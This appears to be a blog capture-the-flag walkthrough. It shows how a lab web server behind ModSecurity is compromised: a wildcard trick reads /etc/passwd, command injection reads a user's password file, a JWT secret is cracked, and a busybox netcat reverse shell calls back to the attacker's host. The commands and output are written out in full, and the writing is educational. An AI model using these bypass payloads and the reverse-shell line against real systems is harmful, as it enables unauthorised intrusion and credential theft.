Lets first start of with an nmap scan against the remote host.
root@ubuntu:~/pentest# nmap -sV -sC -O -Pn -p- -T5 192.168.56.105 Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-16 15:57 MDT Warning: 192.168.56.105 giving up on port because retransmission cap hit (2). Stats: 0:02:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 99.99% done; ETC: 16:00 (0:00:00 remaining) Nmap scan report for 192.168.56.105 Host is up (0.00063s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.27 |_http-server-header: Apache/2.4.27 (Ubuntu) |_http-title: 403 Forbidden MAC Address: 08:00:27:6A:86:41 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Network Distance: 1 hop Service Info: Host: 127.0.1.1 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 193.38 seconds root@ubuntu:~/pentest#
NMAP came back with only port 80 open. if we visit the website we see this:
Our next task is to hit it with nikto to see if it finds anything interesting.
root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.105 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.56.105 + Target Hostname: 192.168.56.105 + Target Port: 80 + Start Time: 2019-10-16 16:02:24 (GMT-6) --------------------------------------------------------------------------- + Server: Apache/2.4.27 (Ubuntu) + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.27 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 56a9aee1bb80f, mtime: gzip + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD + 7947 requests: 0 error(s) and 3 item(s) reported on remote host + End Time: 2019-10-16 16:03:39 (GMT-6) (75 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@ubuntu:~/src/nikto/program#
Nikto didnt come back with anything of any interest. Lets try dirb and see what it does.
+ http://192.168.56.105/.config (CODE:403|SIZE:296) + http://192.168.56.105/_vti_bin/_vti_adm/admin.dll (CODE:403|SIZE:316) + http://192.168.56.105/_vti_bin/_vti_aut/author.dll (CODE:403|SIZE:317) + http://192.168.56.105/_vti_bin/shtml.dll (CODE:403|SIZE:307) + http://192.168.56.105/awstats.conf (CODE:403|SIZE:301) + http://192.168.56.105/development.log (CODE:403|SIZE:304) + http://192.168.56.105/global.asa (CODE:403|SIZE:299) + http://192.168.56.105/global.asax (CODE:403|SIZE:300) + http://192.168.56.105/index.html (CODE:200|SIZE:10918) + http://192.168.56.105/main.mdb (CODE:403|SIZE:297) + http://192.168.56.105/php.ini (CODE:403|SIZE:296) + http://192.168.56.105/production.log (CODE:403|SIZE:303) + http://192.168.56.105/readfile (CODE:403|SIZE:416) + http://192.168.56.105/server-status (CODE:403|SIZE:302) + http://192.168.56.105/spamlog.log (CODE:403|SIZE:300) + http://192.168.56.105/thumbs.db (CODE:403|SIZE:298) + http://192.168.56.105/Thumbs.db (CODE:403|SIZE:298) + http://192.168.56.105/WS_FTP.LOG (CODE:403|SIZE:299)
It came back with results but all are 403 forbidden. There could be a WAF in place because most of these files are for IIS lets run wafw00f on the host and see what it says. Wafw00f came back with a positive result, so we know the website is behind a Web Application Firewall and that firewall is ModSecurty. I decide to try wfuzz against it looking for common file and extensions.
sam@ubuntu:~/src/wfuzz$ ./wfuzz -w /wordlist/general/big.txt -w /wordlist/general/extensions_common.txt --hc '403,404' -t 50 http://192.168.56.105/FUZZFUZ2Z ******************************************************** * Wfuzz 2.4 - The Web Fuzzer * ******************************************************** Target: http://192.168.56.105/FUZZFUZ2Z Total requests: 84672 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000037784: 200 375 L 964 W 10918 Ch "index - .html" 000076207: 200 40 L 159 W 1986 Ch "test - .php" sam@ubuntu:~/src/wfuzz$
Wfuzz came back with two files index.html and test.php lets navigate to test.php and see what it is.
Looks like a browser identification page. if we view source we find something interesting.
href='test.php?file=last.html
There could be a LFI/RFI in the test.php If we try to include /etc/passwd we get a 403 forbidden since we are being blocked by the ModSecurity WAF. So I had to google on how you could bypass modsecurity.
http://192.168.56.105/test.php?file=/e?c/?asswd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false messagebus:x:105:109::/var/run/dbus:/bin/false _apt:x:106:65534::/nonexistent:/bin/false mysql:x:107:110:MySQL Server,,,:/nonexistent:/bin/false uuidd:x:108:113::/run/uuidd:/bin/false bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
We find the user bob is on the box.
After playing around with the file parameter I found out that this was vulnerable to command injection instead.
<?php echo shell_exec('cat' . $_GET['file']);?>
http://192.168.56.105/test.php?file=a;/b?n/un?me%20-a
If you remember we found the user bob in the /etc/passwd file, lets try and list bobs home directory to see if there is anything interesting in it.
http://192.168.56.105/test.php?file=last.html;%20$u%20ls%20-la%20/home/bob
-rw-r--r-- 1 bob bob 155 Apr 30 2018 ._pw_
We see the file ._pw_ in bobs home directory if we want to view the contents of ._pw_ we can use the head command
http://192.168.56.105/test.php?file=last.html;%20$u%20head%20/home/bob/._pw_
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg
Theses are all base64 encoded values which need to be decoded. we can use the base64 utility to decode each string.
{"sub":"1234567890","name":"John Doe","iat":1516239022}
It turns out to be some type of JSON string which can be cracked using c-jwt-cracker.
root@ubuntu:~/src/c-jwt-cracker# ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg Secret is "mlnV1" root@ubuntu:~/src/c-jwt-cracker#
So now we got the secret, but first we need a shell on the box so we can issue commands from there instead of trying to bypass the waf every time. One way we can do this is with BusyBox. BusyBox combines tiny versions of many common UNIX utilities into a single small executable.
http://192.168.56.105/test.php?file=a;busybox nc 192.168.56.107 4444 -e sh -i
If we setup a listener on our local box we get a connect back and drop to a shell.
root@kali:~# nc -v -l -p 4444 listening on [any] 4444 ... 192.168.56.105: inverse host lookup failed: Unknown host connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 48922 BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) built-in shell (ash) Enter 'help' for a list of built-in commands. /var/www/html$
If we try to su to user bob with the password 'mlnV1' we get denied, but if we try to su to root we get a root shell. So the password stored in bobs home directory is the root password to the box. When we cd to /root we see the flag
No comments:
Post a Comment